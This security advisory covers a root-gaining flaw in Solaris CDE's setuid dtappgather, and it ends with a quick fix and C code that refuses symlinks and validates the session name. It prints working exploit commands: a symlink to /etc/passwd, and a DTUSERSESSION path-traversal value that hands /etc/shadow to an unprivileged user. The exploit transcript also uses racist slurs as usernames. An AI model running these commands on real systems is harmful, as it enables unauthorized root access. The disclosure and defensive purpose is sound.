COMMAND
/usr/dt/bin/dtappgather
SYSTEMS AFFECTED
SunOS 5.5 & 5.5.1 running CDE version 1.0.2
PROBLEM
Mastoras found the following. Local users can change the ownership of
any file, thus gaining root privileges. This happens because
"dtappgather" does not check whether the file
/var/dt/appconfig/appmanager/generic-display-0
is a symbolic link and happily chown()s it to the user. When CERT
released advisory CA-98.02 (see CDE in the 'mUNIXes' section) about
/usr/dt/bin/dtappgather, Mastoras played a little with dtappgather
and discovered the problem above, but thought that patch
104498-02 corrected it, as described in Sun's section of CA-98.02.
After applying the patch, it was still possible to gain root
privileges. The following exploit was initially posted to hack.gr's
security mailing list, "haxor":
nigg0r@host% ls -l /etc/passwd
-r--r--r-- 1 root other 1585 Dec 17 22:26 /etc/passwd
nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
nigg0r@host% dtappgather
MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists
nigg0r@host% ls -l /etc/passwd
-r-xr-xr-x 1 nigg0r niggers 1585 Dec 17 22:26 /etc/passwd
nigg0r@host% echo "nigg0r wins! Fatality!" | mail root
It would have been easy to find the exploit if you had read CERT's
advisory. The following steps were enough:
% cp /usr/dt/bin/dtappgather . [you can't "truss" suid proggies]
% truss -o koko ./dtappgather
% more koko
[ shitty ld things ]
chown("/var/dt/appconfig/appmanager/generic-display-0", 666, 666) = 0
chmod("/var/dt/appconfig/appmanager/generic-display-0", 0555) = 0
[ shitty things ]
J.A. Gutierrez added that the exploit is much simpler than that.
Simply:
$ id
uid=6969(foo) gid=666(bar)
$ ls -l /etc/shadow
-r-------- 1 root sys 234 Nov 7 1999 /etc/shadow
$ env DTUSERSESSION=../../../../../../../etc/shadow dtappgather
$ ls -l /etc/shadow
-r-xr-xr-x 1 foo bar 234 Nov 7 1999 /etc/shadow
However, the first exploit works (at least on Solaris 2.5) even
after patching CDE according to the CERT advisory.
SOLUTION
SunOS 5.6 (or CDE 1.2) ships with the directory
/var/dt/appconfig/appmanager/ in mode 755, so it is not possible to
make the necessary link. In SunOS 5.5*, on the other hand, this
directory has mode 777, so you can easily make the link, or even
unlink/rename the file "generic-display-0" if it exists and is owned
by another user. Quick Fix:
chmod -s /usr/dt/bin/dtappgather
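Beyond removing the setuid bit, the code-level fix is to refuse the chown when the name resolves to a link and to validate the session name before it is spliced into the path. The following is an added example, not dtappgather's or Sun's code; the function names and the assumption that DTUSERSESSION is checked with session_name_ok() before the path is built are mine:

```c
#define _XOPEN_SOURCE 700   /* O_NOFOLLOW, mkdtemp on glibc */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Reject a session name that could leave the appmanager directory
 * (the DTUSERSESSION=../../../etc/shadow variant). 1 = acceptable. */
int session_name_ok(const char *name)
{
    if (name == NULL || *name == '\0' || strchr(name, '/') != NULL) return 0;
    return strcmp(name, ".") != 0 && strcmp(name, "..") != 0;
}

/* chown only a regular file opened without following symlinks, and apply
 * the change to the descriptor, so neither a link nor a rename between
 * check and use can redirect it. Returns 0, or -1 when refused/failed. */
int chown_regular_nofollow(const char *path, uid_t uid, gid_t gid)
{
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NOCTTY);
    if (fd < 0) return -1;                 /* ELOOP: path is a symlink */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);                         /* not a plain file, or hard-linked elsewhere */
        return -1;
    }
    int rc = fchown(fd, uid, gid);
    close(fd);
    return rc;
}

/* Constructed self-check: fresh temp dir holding a regular file and a
 * "generic-display-0" symlink to it. Returns 1 when the link is refused and
 * the real file (chown to our own ids, legal without root) is accepted. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/dtappgather-demo-XXXXXX", target[256], link[256];
    if (mkdtemp(dir) == NULL) return 0;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(link, sizeof link, "%s/generic-display-0", dir);
    int fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || symlink(target, link) != 0) return 0;
    close(fd);
    int refused  = chown_regular_nofollow(link, getuid(), getgid()) == -1;
    int accepted = chown_regular_nofollow(target, getuid(), getgid()) == 0;
    unlink(link); unlink(target); rmdir(dir);
    return refused && accepted;
}
```

The hard-link count check matters on older systems where an unprivileged user could hard-link a root-owned file into the world-writable directory; a symlink check alone would not catch that.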